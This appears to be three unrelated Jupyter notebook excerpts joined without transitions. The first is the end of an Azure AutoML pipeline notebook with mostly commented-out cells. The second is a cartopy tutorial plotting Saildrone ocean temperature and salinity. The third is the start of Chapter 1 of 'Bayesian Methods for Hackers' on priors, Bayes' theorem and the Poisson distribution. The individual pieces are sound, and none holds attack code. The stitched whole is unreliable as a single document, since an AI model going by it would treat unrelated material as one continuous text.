display(transformed_df.head(5))
```
#### View training data used by AutoML
```
split_step = pipeline_run.find_step_run(testTrainSplitStep.name)[0]
train_split = fetch_df(split_step, output_split_train.name)
display(train_split.describe())
display(train_split.head(5))
```
#### View the details of the AutoML run
```
from azureml.train.automl.run import AutoMLRun
#from azureml.widgets import RunDetails
# workaround to get the automl run as it's the last step in the pipeline
# and get_steps() returns the steps from latest to first
for step in pipeline_run.get_steps():
    automl_step_run_id = step.id
    print(step.name)
    print(automl_step_run_id)
    break

automl_run = AutoMLRun(experiment=experiment, run_id=automl_step_run_id)
#RunDetails(automl_run).show()
```
### Retrieve the best model
Uncomment the below cell to retrieve the best model
```
# best_run, fitted_model = automl_run.get_output()
# print(best_run)
# print(fitted_model)
```
### Test the model
#### Get test data
Uncomment the below cell to get test data
```
# split_step = pipeline_run.find_step_run(testTrainSplitStep.name)[0]
# x_test = fetch_df(split_step, output_split_test.name)[['distance','passengers', 'vendor','pickup_weekday','pickup_hour']]
# y_test = fetch_df(split_step, output_split_test.name)[['cost']]
# display(x_test.head(5))
# display(y_test.head(5))
```
#### Test the best fitted model
Uncomment the below cell to test the best fitted model
```
# y_predict = fitted_model.predict(x_test)
# y_actual = y_test.values.tolist()
# display(pd.DataFrame({'Actual':y_actual, 'Predicted':y_predict}).head(5))
# import matplotlib.pyplot as plt
# fig = plt.figure(figsize=(14, 10))
# ax1 = fig.add_subplot(111)
# distance_vals = [x[0] for x in x_test.values]
# ax1.scatter(distance_vals[:100], y_predict[:100], s=18, c='b', marker="s", label='Predicted')
# ax1.scatter(distance_vals[:100], y_actual[:100], s=18, c='r', marker="o", label='Actual')
# ax1.set_xlabel('distance (mi)')
# ax1.set_title('Predicted and Actual Cost/Distance')
# ax1.set_ylabel('Cost ($)')
# plt.legend(loc='upper left', prop={'size': 12})
# plt.rcParams.update({'font.size': 14})
# plt.show()
```
# Plotting with [cartopy](https://scitools.org.uk/cartopy/docs/latest/)
From Cartopy website:
* Cartopy is a Python package designed for geospatial data processing in order to produce maps and other geospatial data analyses.
* Cartopy makes use of the powerful PROJ.4, NumPy and Shapely libraries and includes a programmatic interface built on top of Matplotlib for the creation of publication quality maps.
* Key features of cartopy are its object oriented projection definitions, and its ability to transform points, lines, vectors, polygons and images between those projections.
* You will find cartopy especially useful for large area / small scale data, where Cartesian assumptions of spherical data traditionally break down. If you’ve ever experienced a singularity at the pole or a cut-off at the dateline, it is likely you will appreciate cartopy’s unique features!
```
import numpy as np
import matplotlib.pyplot as plt
import xarray as xr
import cartopy.crs as ccrs
```
# Read in data using xarray
- Read in the Saildrone USV file either from a local disc `xr.open_dataset(file)`
- change latitude and longitude to lat and lon `.rename({'longitude':'lon','latitude':'lat'})`
```
file = '../data/saildrone-gen_5-antarctica_circumnavigation_2019-sd1020-20190119T040000-20190803T043000-1440_minutes-v1.1564857794963.nc'
ds_usv = xr.open_dataset(file).rename({'longitude': 'lon', 'latitude': 'lat'})
```
# Open the dataset, mask land, plot result
* `ds_sst = xr.open_dataset(url)`
* use `ds_sst = ds_sst.where(ds_sst.mask==1)` to keep only values where the mask equals 1 (ocean), masking out land
```
# If you are offline use the first url
#url = '../data/20111101120000-CMC-L4_GHRSST-SSTfnd-CMC0.2deg-GLOB-v02.0-fv02.0.nc'
url = 'https://podaac-opendap.jpl.nasa.gov/opendap/allData/ghrsst/data/GDS2/L4/GLOB/CMC/CMC0.2deg/v2/2011/305/20111101120000-CMC-L4_GHRSST-SSTfnd-CMC0.2deg-GLOB-v02.0-fv02.0.nc'
ds_sst = xr.open_dataset(url)
ds_sst = ds_sst.where(ds_sst.mask == 1)  # keep ocean points (mask == 1), dropping land
```
## explore the in situ data and quickly plot using cartopy
* first set up the axis with the projection you want: https://scitools.org.uk/cartopy/docs/latest/crs/projections.html
* plot to that axis and tell the projection that your data is in
#### Run the cell below and see what the image looks like. Then try adding in the lines below, one at a time, and re-run cell to see what happens
* set a background image `ax.stock_img()`
* draw coastlines `ax.coastlines(resolution='50m')`
* add a colorbar and label it: `cax = plt.colorbar(cs1)` then `cax.set_label('SST (K)')`
```
#for polar data, plot temperature
datamin = 0
datamax = 12
ax = plt.axes(projection=ccrs.SouthPolarStereo()) #here is where you set your axis projection
(ds_sst.analysed_sst - 273.15).plot(ax=ax,
                                    transform=ccrs.PlateCarree(),  # set data projection
                                    vmin=datamin,  # data min
                                    vmax=datamax)  # data max
cs1 = ax.scatter(ds_usv.lon, ds_usv.lat,
                 transform=ccrs.PlateCarree(),  # set data projection
                 s=10.0,  # size for scatter point
                 c=ds_usv.TEMP_CTD_MEAN,  # color the scatter points by the USV temperature
                 edgecolor='none',  # no edgecolor
                 cmap='jet',  # colormap
                 vmin=datamin,  # data min
                 vmax=datamax)  # data max
ax.set_extent([-180, 180, -90, -45], crs=ccrs.PlateCarree()) #data projection
```
# Plot the salinity
* Take the code from above but use `c=ds_usv.SAL_MEAN`
* Run the code, what looks wrong?
* Change `datamin` and `datamax`
```
```
# Let's plot some data off California
* Read in data from a cruise along the California / Baja Coast
* `ds_usv = xr.open_dataset(url).rename({'longitude':'lon','latitude':'lat'})`
```
#use the first URL if you are offline
#url = '../data/saildrone-gen_4-baja_2018-sd1002-20180411T180000-20180611T055959-1_minutes-v1.nc'
url = 'https://podaac-opendap.jpl.nasa.gov/opendap/hyrax/allData/insitu/L2/saildrone/Baja/saildrone-gen_4-baja_2018-sd1002-20180411T180000-20180611T055959-1_minutes-v1.nc'
```
* Plot the data using the code from above, but change the projection
`ax = plt.axes(projection=ccrs.PlateCarree())`
```
```
* Zoom into the region of the cruise
* First calculate the lat/lon box<br>
`lonmin,lonmax = ds_usv.lon.min().data-2,ds_usv.lon.max().data+2`<br>
`latmin,latmax = ds_usv.lat.min().data-2,ds_usv.lat.max().data+2`
* Then, after plotting the data, change the extent
`ax.set_extent([lonmin,lonmax,latmin,latmax], crs=ccrs.PlateCarree())`
Probabilistic Programming and Bayesian Methods for Hackers
========
Welcome to *Bayesian Methods for Hackers*. The full Github repository is available at [github/Probabilistic-Programming-and-Bayesian-Methods-for-Hackers](https://github.com/CamDavidsonPilon/Probabilistic-Programming-and-Bayesian-Methods-for-Hackers). The other chapters can be found on the project's [homepage](https://camdavidsonpilon.github.io/Probabilistic-Programming-and-Bayesian-Methods-for-Hackers/). We hope you enjoy the book, and we encourage any contributions!
#### Looking for a printed version of Bayesian Methods for Hackers?
_Bayesian Methods for Hackers_ is now a published book by Addison-Wesley, available on [Amazon](http://www.amazon.com/Bayesian-Methods-Hackers-Probabilistic-Addison-Wesley/dp/0133902838)!

Chapter 1
======
***
The Philosophy of Bayesian Inference
------
> You are a skilled programmer, but bugs still slip into your code. After a particularly difficult implementation of an algorithm, you decide to test your code on a trivial example. It passes. You test the code on a harder problem. It passes once again. And it passes the next, *even more difficult*, test too! You are starting to believe that there may be no bugs in this code...
If you think this way, then congratulations, you already are thinking Bayesian! Bayesian inference is simply updating your beliefs after considering new evidence. A Bayesian can rarely be certain about a result, but he or she can be very confident. Just like in the example above, we can never be 100% sure that our code is bug-free unless we test it on every possible problem; something rarely possible in practice. Instead, we can test it on a large number of problems, and if it succeeds we can feel more *confident* about our code, but still not certain. Bayesian inference works identically: we update our beliefs about an outcome; rarely can we be absolutely sure unless we rule out all other alternatives.
### The Bayesian state of mind
Bayesian inference differs from more traditional statistical inference by preserving *uncertainty*. At first, this sounds like a bad statistical technique. Isn't statistics all about deriving *certainty* from randomness? To reconcile this, we need to start thinking like Bayesians.
The Bayesian world-view interprets probability as a measure of *believability in an event*, that is, how confident we are in an event occurring. In fact, we will see in a moment that this is the natural interpretation of probability.
For this to be clearer, we consider an alternative interpretation of probability: *Frequentist*, known as the more *classical* version of statistics, assumes that probability is the long-run frequency of events (hence the bestowed title). For example, the *probability of plane accidents* under a frequentist philosophy is interpreted as the *long-term frequency of plane accidents*. This makes logical sense for many probabilities of events, but becomes more difficult to understand when events have no long-term frequency of occurrences. Consider: we often assign probabilities to outcomes of presidential elections, but the election itself only happens once! Frequentists get around this by invoking alternative realities and saying across all these realities, the frequency of occurrences defines the probability.
Bayesians, on the other hand, have a more intuitive approach. Bayesians interpret a probability as a measure of *belief*, or confidence, of an event occurring. Simply, a probability is a summary of an opinion. An individual who assigns a belief of 0 to an event has no confidence that the event will occur; conversely, assigning a belief of 1 implies that the individual is absolutely certain of an event occurring. Beliefs between 0 and 1 allow for weightings of other outcomes. This definition agrees with the probability of a plane accident example, for having observed the frequency of plane accidents, an individual's belief should be equal to that frequency, excluding any outside information. Similarly, under this definition of probability being equal to beliefs, it is meaningful to speak about probabilities (beliefs) of presidential election outcomes: how confident are you candidate *A* will win?
Notice in the paragraph above, I assigned the belief (probability) measure to an *individual*, not to Nature. This is very interesting, as this definition leaves room for conflicting beliefs between individuals. Again, this is appropriate for what naturally occurs: different individuals have different beliefs of events occurring, because they possess different *information* about the world. The existence of different beliefs does not imply that anyone is wrong. Consider the following examples demonstrating the relationship between individual beliefs and probabilities:
- I flip a coin, and we both guess the result. We would both agree, assuming the coin is fair, that the probability of Heads is 1/2. Assume, then, that I peek at the coin. Now I know for certain what the result is: I assign probability 1.0 to either Heads or Tails (whichever it is). Now what is *your* belief that the coin is Heads? My knowledge of the outcome has not changed the coin's results. Thus we assign different probabilities to the result.
- Your code either has a bug in it or not, but we do not know for certain which is true, though we have a belief about the presence or absence of a bug.
- A medical patient is exhibiting symptoms $x$, $y$ and $z$. There are a number of diseases that could be causing all of them, but only a single disease is present. A doctor has beliefs about which disease, but a second doctor may have slightly different beliefs.
This philosophy of treating beliefs as probability is natural to humans. We employ it constantly as we interact with the world and only see partial truths, but gather evidence to form beliefs. Alternatively, you have to be *trained* to think like a frequentist.
To align ourselves with traditional probability notation, we denote our belief about event $A$ as $P(A)$. We call this quantity the *prior probability*.
John Maynard Keynes, a great economist and thinker, said "When the facts change, I change my mind. What do you do, sir?" This quote reflects the way a Bayesian updates his or her beliefs after seeing evidence. Even — especially — if the evidence is counter to what was initially believed, the evidence cannot be ignored. We denote our updated belief as $P(A |X )$, interpreted as the probability of $A$ given the evidence $X$. We call the updated belief the *posterior probability* so as to contrast it with the prior probability. For example, consider the posterior probabilities (read: posterior beliefs) of the above examples, after observing some evidence $X$:
1\. $P(A): \;\;$ the coin has a 50 percent chance of being Heads. $P(A | X):\;\;$ You look at the coin, observe a Heads has landed, denote this information $X$, and trivially assign probability 1.0 to Heads and 0.0 to Tails.
2\. $P(A): \;\;$ This big, complex code likely has a bug in it. $P(A | X): \;\;$ The code passed all $X$ tests; there still might be a bug, but its presence is less likely now.
3\. $P(A):\;\;$ The patient could have any number of diseases. $P(A | X):\;\;$ Performing a blood test generated evidence $X$, ruling out some of the possible diseases from consideration.
It's clear that in each example we did not completely discard the prior belief after seeing new evidence $X$, but we *re-weighted the prior* to incorporate the new evidence (i.e. we put more weight, or confidence, on some beliefs versus others).
By introducing prior uncertainty about events, we are already admitting that any guess we make is potentially very wrong. After observing data, evidence, or other information, we update our beliefs, and our guess becomes *less wrong*. This is the alternative side of the prediction coin, where typically we try to be *more right*.
### Bayesian Inference in Practice
If frequentist and Bayesian inference were programming functions, with inputs being statistical problems, then the two would be different in what they return to the user. The frequentist inference function would return a number, representing an estimate (typically a summary statistic like the sample average etc.), whereas the Bayesian function would return *probabilities*.
For example, in our debugging problem above, calling the frequentist function with the argument "My code passed all $X$ tests; is my code bug-free?" would return a *YES*. On the other hand, asking our Bayesian function "Often my code has bugs. My code passed all $X$ tests; is my code bug-free?" would return something very different: probabilities of *YES* and *NO*. The function might return:
> *YES*, with probability 0.8; *NO*, with probability 0.2
This is very different from the answer the frequentist function returned. Notice that the Bayesian function accepted an additional argument: *"Often my code has bugs"*. This parameter is the *prior*. By including the prior parameter, we are telling the Bayesian function to include our belief about the situation. Technically this parameter in the Bayesian function is optional, but we will see excluding it has its own consequences.
#### Incorporating evidence
As we acquire more and more instances of evidence, our prior belief is *washed out* by the new evidence. This is to be expected. For example, if your prior belief is something ridiculous, like "I expect the sun to explode today", and each day you are proved wrong, you would hope that any inference would correct you, or at least align your beliefs better. Bayesian inference will correct this belief.
Denote $N$ as the number of instances of evidence we possess. As we gather an *infinite* amount of evidence, say as $N \rightarrow \infty$, our Bayesian results (often) align with frequentist results. Hence for large $N$, statistical inference is more or less objective. On the other hand, for small $N$, inference is much more *unstable*: frequentist estimates have more variance and larger confidence intervals. This is where Bayesian analysis excels. By introducing a prior, and returning probabilities (instead of a scalar estimate), we *preserve the uncertainty* that reflects the instability of statistical inference of a small $N$ dataset.
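The "prior washed out by evidence" claim can be made concrete with a short simulation: estimate a coin's heads-probability from a conjugate Beta prior and watch the posterior mean migrate from the prior toward the data as $N$ grows. All numbers here (the Beta(10, 10) prior, the true heads-probability 0.7, the seed) are illustrative choices, not from the text:

```python
import random

random.seed(42)
a, b = 10, 10        # Beta(10, 10) prior, deliberately centred on 0.5
p_true = 0.7         # true heads-probability of the simulated coin

results = {}
for n in [0, 10, 100, 10000]:
    heads = sum(random.random() < p_true for _ in range(n))
    # Posterior of a Beta(a, b) prior after `heads` in `n` flips is
    # Beta(a + heads, b + n - heads); its mean is:
    results[n] = (a + heads) / (a + b + n)
    print(f"N={n:6d}  posterior mean = {results[n]:.3f}")
```

With no data the posterior mean is the prior's 0.5; by $N = 10000$ it sits essentially on top of the true 0.7, exactly the washing-out described above.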
One may think that for large $N$, one can be indifferent between the two techniques since they offer similar inference, and might lean towards the computationally-simpler, frequentist methods. An individual in this position should consider the following quote by Andrew Gelman (2005)[1], before making such a decision:
> Sample sizes are never large. If $N$ is too small to get a sufficiently-precise estimate, you need to get more data (or make more assumptions). But once $N$ is "large enough," you can start subdividing the data to learn more (for example, in a public opinion poll, once you have a good estimate for the entire country, you can estimate among men and women, northerners and southerners, different age groups, etc.). $N$ is never enough because if it were "enough" you'd already be on to the next problem for which you need more data.
### Are frequentist methods incorrect then?
**No.**
Frequentist methods are still useful or state-of-the-art in many areas. Tools such as least squares linear regression, LASSO regression, and expectation-maximization algorithms are all powerful and fast. Bayesian methods complement these techniques by solving problems that these approaches cannot, or by illuminating the underlying system with more flexible modeling.
#### A note on *Big Data*
Paradoxically, big data's predictive analytic problems are actually solved by relatively simple algorithms [2][4]. Thus we can argue that big data's prediction difficulty does not lie in the algorithm used, but instead in the computational difficulties of storage and execution on big data. (One should also consider Gelman's quote from above and ask, "Do I really have big data?")
The much more difficult analytic problems involve *medium data* and, especially troublesome, *really small data*. Using a similar argument as Gelman's above, if big data problems are *big enough* to be readily solved, then we should be more interested in the *not-quite-big enough* datasets.
### Our Bayesian framework
We are interested in beliefs, which can be interpreted as probabilities by thinking Bayesian. We have a *prior* belief in event $A$, beliefs formed by previous information, e.g., our prior belief about bugs being in our code before performing tests.
Secondly, we observe our evidence. To continue our buggy-code example: if our code passes $X$ tests, we want to update our belief to incorporate this. We call this new belief the *posterior* probability. Updating our belief is done via the following equation, known as Bayes' Theorem, after its discoverer Thomas Bayes:
\begin{align}
P( A | X ) = & \frac{ P(X | A) P(A) } {P(X) } \\\\[5pt]
& \propto P(X | A) P(A)\;\; (\propto \text{is proportional to } )
\end{align}
The above formula is not unique to Bayesian inference: it is a mathematical fact with uses outside Bayesian inference. Bayesian inference merely uses it to connect the prior probability $P(A)$ with an updated posterior probability $P(A | X )$.
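As a quick numeric sketch of the update rule (the function name and numbers here are my own, not from any library):

```python
def bayes_update(prior_a, p_x_given_a, p_x_given_not_a):
    """Posterior P(A|X) for a binary event A, via Bayes' Theorem."""
    # P(X) expands over the two ways X can occur: with A, or with not-A.
    p_x = p_x_given_a * prior_a + p_x_given_not_a * (1 - prior_a)
    return p_x_given_a * prior_a / p_x

# With a 50-50 prior, and evidence twice as likely under A as under not-A:
print(bayes_update(0.5, 1.0, 0.5))  # 0.666...
```

The same function reappears implicitly in the buggy-code example below, where the prior is 0.2 and the posterior works out to 1/3.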
##### Example: Mandatory coin-flip example
Every statistics text must contain a coin-flipping example, I'll use it here to get it out of the way. Suppose, naively, that you are unsure about the probability of heads in a coin flip (spoiler alert: it's 50%). You believe there is some true underlying ratio, call it $p$, but have no prior opinion on what $p$ might be.
We begin to flip a coin, and record the observations: either $H$ or $T$. This is our observed data. An interesting question to ask is how our inference changes as we observe more and more data. More specifically, what do our posterior probabilities look like when we have little data, versus when we have lots of data?
Below we plot a sequence of updating posterior probabilities as we observe increasing amounts of data (coin flips).
```
"""
The book uses a custom matplotlibrc file, which provides the unique styles for
matplotlib plots. If executing this book, and you wish to use the book's
styling, provided are two options:
    1. Overwrite your own matplotlibrc file with the rc-file provided in the
       book's styles/ dir. See http://matplotlib.org/users/customizing.html
    2. Also in the styles is bmh_matplotlibrc.json file. This can be used to
       update the styles in only this notebook. Try running the following code:

        import json, matplotlib
        s = json.load(open("../styles/bmh_matplotlibrc.json"))
        matplotlib.rcParams.update(s)
"""

# The code below can be passed over, as it is currently not important, plus it
# uses advanced topics we have not covered yet. LOOK AT PICTURE, MICHAEL!
%matplotlib inline
from IPython.core.pylabtools import figsize
import numpy as np
from matplotlib import pyplot as plt
import scipy.stats as stats

figsize(11, 9)

dist = stats.beta
n_trials = [0, 1, 2, 3, 4, 5, 8, 15, 50, 500]
data = stats.bernoulli.rvs(0.5, size=n_trials[-1])
x = np.linspace(0, 1, 100)

# For the already prepared, I'm using the Binomial's conjugate prior.
for k, N in enumerate(n_trials):
    sx = plt.subplot(len(n_trials) // 2, 2, k + 1)  # integer division for the subplot grid
    if k in [0, len(n_trials) - 1]:
        plt.xlabel("$p$, probability of heads")
    plt.setp(sx.get_yticklabels(), visible=False)
    heads = data[:N].sum()
    y = dist.pdf(x, 1 + heads, 1 + N - heads)
    plt.plot(x, y, label="observe %d tosses,\n %d heads" % (N, heads))
    plt.fill_between(x, 0, y, color="#348ABD", alpha=0.4)
    plt.vlines(0.5, 0, 4, color="k", linestyles="--", lw=1)
    leg = plt.legend()
    leg.get_frame().set_alpha(0.4)
    plt.autoscale(tight=True)

plt.suptitle("Bayesian updating of posterior probabilities",
             y=1.02,
             fontsize=14)
plt.tight_layout()
```
The posterior probabilities are represented by the curves, and our uncertainty is proportional to the width of the curve. As the plot above shows, as we start to observe data our posterior probabilities start to shift and move around. Eventually, as we observe more and more data (coin-flips), our probabilities will tighten closer and closer around the true value of $p=0.5$ (marked by a dashed line).
Notice that the plots are not always *peaked* at 0.5. There is no reason they should be: recall we assumed we did not have a prior opinion of what $p$ is. In fact, if we observe quite extreme data, say 8 flips and only 1 observed heads, our distribution would look very biased *away* from lumping around 0.5 (with no prior opinion, how confident would you feel betting on a fair coin after observing 8 tails and 1 head?). As more data accumulates, we would see more and more probability being assigned to $p=0.5$, though never all of it.
The next example is a simple demonstration of the mathematics of Bayesian inference.
##### Example: Bug, or just sweet, unintended feature?
Let $A$ denote the event that our code has **no bugs** in it. Let $X$ denote the event that the code passes all debugging tests. For now, we will leave the prior probability of no bugs as a variable, i.e. $P(A) = p$.
We are interested in $P(A|X)$, i.e. the probability of no bugs, given our debugging tests $X$. To use the formula above, we need to compute some quantities.
What is $P(X | A)$, i.e., the probability that the code passes $X$ tests *given* there are no bugs? Well, it is equal to 1, for a code with no bugs will pass all tests.
$P(X)$ is a little bit trickier: The event $X$ can be divided into two possibilities, event $X$ occurring even though our code *indeed has* bugs (denoted $\sim A\;$, spoken *not $A$*), or event $X$ without bugs ($A$). $P(X)$ can be represented as:
\begin{align}
P(X ) & = P(X \text{ and } A) + P(X \text{ and } \sim A) \\\\[5pt]
& = P(X|A)P(A) + P(X | \sim A)P(\sim A)\\\\[5pt]
& = P(X|A)p + P(X | \sim A)(1-p)
\end{align}
We have already computed $P(X|A)$ above. On the other hand, $P(X | \sim A)$ is subjective: our code can pass tests but still have a bug in it, though the probability there is a bug present is reduced. Note this is dependent on the number of tests performed, the degree of complication in the tests, etc. Let's be conservative and assign $P(X|\sim A) = 0.5$. Then
\begin{align}
P(A | X) & = \frac{1\cdot p}{ 1\cdot p +0.5 (1-p) } \\\\
& = \frac{ 2 p}{1+p}
\end{align}
This is the posterior probability. What does it look like as a function of our prior, $p \in [0,1]$?
```
figsize(12.5, 4)
p = np.linspace(0, 1, 50)
plt.plot(p, 2 * p / (1 + p), color="#348ABD", lw=3)
# plt.fill_between(p, 2*p/(1+p), alpha=.5, facecolor=["#A60628"])
plt.scatter(0.2, 2 * (0.2) / 1.2, s=140, c="#348ABD")
plt.xlim(0, 1)
plt.ylim(0, 1)
plt.xlabel("Prior, $P(A) = p$")
plt.ylabel("Posterior, $P(A|X)$, with $P(A) = p$")
plt.title("Is my code bug-free?")
```
We can see the biggest gains if we observe the $X$ tests passed when the prior probability, $p$, is low. Let's settle on a specific value for the prior. I'm a strong programmer (I think), so I'm going to give myself a realistic prior of 0.20, that is, there is a 20% chance that I write code bug-free. To be more realistic, this prior should be a function of how complicated and large the code is, but let's pin it at 0.20. Then my updated belief that my code is bug-free is 0.33.
Recall that the prior is a probability: $p$ is the prior probability that there *are no bugs*, so $1-p$ is the prior probability that there *are bugs*.
Similarly, our posterior is also a probability, with $P(A | X)$ the probability there is no bug *given we saw all tests pass*, hence $1-P(A|X)$ is the probability there is a bug *given all tests passed*. What does our posterior probability look like? Below is a chart of both the prior and the posterior probabilities.
```
figsize(12.5, 4)
colours = ["#348ABD", "#A60628"]

prior = [0.20, 0.80]
posterior = [1. / 3, 2. / 3]
plt.bar([0, .7], prior, alpha=0.70, width=0.25,
        color=colours[0], label="prior distribution",
        lw="3", edgecolor=colours[0])

plt.bar([0 + 0.25, .7 + 0.25], posterior, alpha=0.7,
        width=0.25, color=colours[1],
        label="posterior distribution",
        lw="3", edgecolor=colours[1])

plt.ylim(0, 1)
plt.xticks([0.20, .95], ["Bugs Absent", "Bugs Present"])
plt.title("Prior and Posterior probability of bugs present")
plt.ylabel("Probability")
plt.legend(loc="upper left");
```
Notice that after we observed $X$ occur, the probability of bugs being absent increased. By increasing the number of tests, we can approach confidence (probability 1) that there are no bugs present.
This was a very simple example of Bayesian inference and Bayes rule. Unfortunately, the mathematics necessary to perform more complicated Bayesian inference only becomes more difficult, except for artificially constructed cases. We will later see that this type of mathematical analysis is actually unnecessary. First we must broaden our modeling tools. The next section deals with *probability distributions*. If you are already familiar, feel free to skip (or at least skim), but for the less familiar the next section is essential.
_______
## Probability Distributions
**Let's quickly recall what a probability distribution is:** Let $Z$ be some random variable. Then associated with $Z$ is a *probability distribution function* that assigns probabilities to the different outcomes $Z$ can take. Graphically, a probability distribution is a curve where the probability of an outcome is proportional to the height of the curve. You can see examples in the first figure of this chapter.
We can divide random variables into three classifications:
- **$Z$ is discrete**: Discrete random variables may only assume values on a specified list. Things like populations, movie ratings, and number of votes are all discrete random variables. Discrete random variables become more clear when we contrast them with...
- **$Z$ is continuous**: Continuous random variables can take on arbitrarily exact values. For example, temperature, speed, and time are all modeled as continuous variables because you can progressively make the values more and more precise.
- **$Z$ is mixed**: Mixed random variables assign probabilities to both discrete and continuous random variables, i.e. it is a combination of the above two categories.
#### Expected Value
Expected value (EV) is one of the most important concepts in probability. The EV for a given probability distribution can be described as "the mean value in the long run for many repeated samples from that distribution." To borrow a metaphor from physics, a distribution's EV is like its "center of mass." Imagine repeating the same experiment many times over, and taking the average over each outcome. The more you repeat the experiment, the closer this average will become to the distribution's EV. (Side note: as the number of repeated experiments goes to infinity, the difference between the average outcome and the EV becomes arbitrarily small.)
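A quick numerical sketch of this long-run behaviour (the fair-die example is my own): the sample average of many draws settles near the distribution's EV of $3.5$.

```python
import numpy as np

rng = np.random.default_rng(0)
# A fair six-sided die has EV (1 + 2 + ... + 6) / 6 = 3.5.
rolls = rng.integers(1, 7, size=100_000)  # upper bound is exclusive
print(rolls.mean())  # very close to 3.5
```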
### Discrete Case
If $Z$ is discrete, then its distribution is called a *probability mass function*, which measures the probability $Z$ takes on the value $k$, denoted $P(Z=k)$. Note that the probability mass function completely describes the random variable $Z$, that is, if we know the mass function, we know how $Z$ should behave. There are popular probability mass functions that consistently appear: we will introduce them as needed, but let's introduce the first very useful probability mass function. We say $Z$ is *Poisson*-distributed if:
$$P(Z = k) =\frac{ \lambda^k e^{-\lambda} }{k!}, \; \; k=0,1,2, \dots, \; \; \lambda \in \mathbb{R}_{>0} $$
$\lambda$ is called a parameter of the distribution, and it controls the distribution's shape. For the Poisson distribution, $\lambda$ can be any positive number. By increasing $\lambda$, we add more probability to larger values, and conversely by decreasing $\lambda$ we add more probability to smaller values. One can describe $\lambda$ as the *intensity* of the Poisson distribution.
Unlike $\lambda$, which can be any positive number, the value $k$ in the above formula must be a non-negative integer, i.e., $k$ must take on values 0,1,2, and so on. This is very important, because if you wanted to model a population you could not make sense of populations with 4.25 or 5.612 members.
If a random variable $Z$ has a Poisson mass distribution, we denote this by writing
$$Z \sim \text{Poi}(\lambda) $$
One useful property of the Poisson distribution is that its expected value is equal to its parameter, i.e.:
$$E\large[ \;Z\; | \; \lambda \;\large] = \lambda $$
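Both the mass function and this EV property can be checked numerically (a small sanity check of my own, using scipy's Poisson implementation):

```python
from math import exp, factorial

import scipy.stats as stats

lam, k = 4.25, 3
# The pmf formula above, evaluated by hand, matches scipy's value:
by_hand = lam**k * exp(-lam) / factorial(k)
print(by_hand, stats.poisson.pmf(k, lam))
# And the expected value equals the parameter lambda:
print(stats.poisson.mean(lam))  # 4.25
```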
We will use this property often, so it's useful to remember. Below, we plot the probability mass distribution for different $\lambda$ values. The first thing to notice is that by increasing $\lambda$, we add more probability of larger values occurring. Second, notice that although the graph ends at 15, the distributions do not. They assign positive probability to every non-negative integer.
```
figsize(12.5, 4)

import scipy.stats as stats
a = np.arange(16)
poi = stats.poisson
lambda_ = [1.5, 4.25]
colours = ["#348ABD", "#A60628"]

plt.bar(a, poi.pmf(a, lambda_[0]), color=colours[0],
        label="$\lambda = %.1f$" % lambda_[0], alpha=0.60,
        edgecolor=colours[0], lw="3")

plt.bar(a, poi.pmf(a, lambda_[1]), color=colours[1],
        label="$\lambda = %.1f$" % lambda_[1], alpha=0.60,
        edgecolor=colours[1], lw="3")

plt.xticks(a + 0.4, a)
plt.legend()
plt.ylabel("probability of $k$")
plt.xlabel("$k$")
plt.title("Probability mass function of a Poisson random variable; differing \
$\lambda$ values")
```
### Continuous Case
Instead of a probability mass function, a continuous random variable has a *probability density function*. This might seem like unnecessary nomenclature, but the density function and the mass function are very different creatures. An example of continuous random variable is a random variable with *exponential density*. The density function for an exponential random variable looks like this:
$$f_Z(z | \lambda) = \lambda e^{-\lambda z }, \;\; z\ge 0$$
Like a Poisson random variable, an exponential random variable can take on only non-negative values. But unlike a Poisson variable, the exponential can take on *any* non-negative values, including non-integral values such as 4.25 or 5.612401. This property makes it a poor choice for count data, which must be an integer, but a great choice for time data, temperature data (measured in Kelvins, of course), or any other precise *and positive* variable. The graph below shows two probability density functions with different $\lambda$ values.
When a random variable $Z$ has an exponential distribution with parameter $\lambda$, we say *$Z$ is exponential* and write
$$Z \sim \text{Exp}(\lambda)$$
Given a specific $\lambda$, the expected value of an exponential random variable is equal to the inverse of $\lambda$, that is:
$$E[\; Z \;|\; \lambda \;] = \frac{1}{\lambda}$$
```
a = np.linspace(0, 4, 100)
expo = stats.expon
lambda_ = [0.5, 1]

for l, c in zip(lambda_, colours):
    plt.plot(a, expo.pdf(a, scale=1. / l), lw=3,
             color=c, label="$\lambda = %.1f$" % l)
    plt.fill_between(a, expo.pdf(a, scale=1. / l), color=c, alpha=.33)

plt.legend()
plt.ylabel("PDF at $z$")
plt.xlabel("$z$")
plt.ylim(0, 1.2)
plt.title("Probability density function of an Exponential random variable;\
 differing $\lambda$");
```
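As a small check of my own (not from the original text): scipy parameterizes the exponential by `scale` $= 1/\lambda$, so the mean and the density at zero recover $1/\lambda$ and $\lambda$ respectively.

```python
import scipy.stats as stats

lam = 0.5
# scipy's expon uses scale = 1/lambda
print(stats.expon.mean(scale=1. / lam))    # E[Z | lambda] = 1/lambda = 2.0
print(stats.expon.pdf(0, scale=1. / lam))  # f(0) = lambda = 0.5
```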
### But what is $\lambda \;$?
**This question is what motivates statistics**. In the real world, $\lambda$ is hidden from us. We see only $Z$, and must go backwards to try and determine $\lambda$. The problem is difficult because there is no one-to-one mapping from $Z$ to $\lambda$. Many different methods have been created to solve the problem of estimating $\lambda$, but since $\lambda$ is never actually observed, no one can say for certain which method is best!
Bayesian inference is concerned with *beliefs* about what $\lambda$ might be. Rather than try to guess $\lambda$ exactly, we can only talk about what $\lambda$ is likely to be by assigning a probability distribution to $\lambda$.
This might seem odd at first. After all, $\lambda$ is fixed; it is not (necessarily) random! How can we assign probabilities to values of a non-random variable? Ah, we have fallen for our old, frequentist way of thinking. Recall that under Bayesian philosophy, we *can* assign probabilities if we interpret them as beliefs. And it is entirely acceptable to have *beliefs* about the parameter $\lambda$.
##### Example: Inferring behaviour from text-message data
Let's try to model a more interesting example, one that concerns the rate at which a user sends and receives text messages:
> You are given a series of daily text-message counts from a user of your system. The data, plotted over time, appears in the chart below. You are curious to know if the user's text-messaging habits have changed over time, either gradually or suddenly. How can you model this? (This is in fact my own text-message data. Judge my popularity as you wish.)
```
figsize(12.5, 3.5)
count_data = np.loadtxt("data/txtdata.csv")
n_count_data = len(count_data)
plt.bar(np.arange(n_count_data), count_data, color="#348ABD")
plt.xlabel("Time (days)")
plt.ylabel("count of text-msgs received")
plt.title("Did the user's texting habits change over time?")
plt.xlim(0, n_count_data);
```
Before we start modeling, see what you can figure out just by looking at the chart above. Would you say there was a change in behaviour during this time period?
How can we start to model this? Well, as we have conveniently already seen, a Poisson random variable is a very appropriate model for this type of *count* data. Denoting day $i$'s text-message count by $C_i$,
$$ C_i \sim \text{Poisson}(\lambda) $$
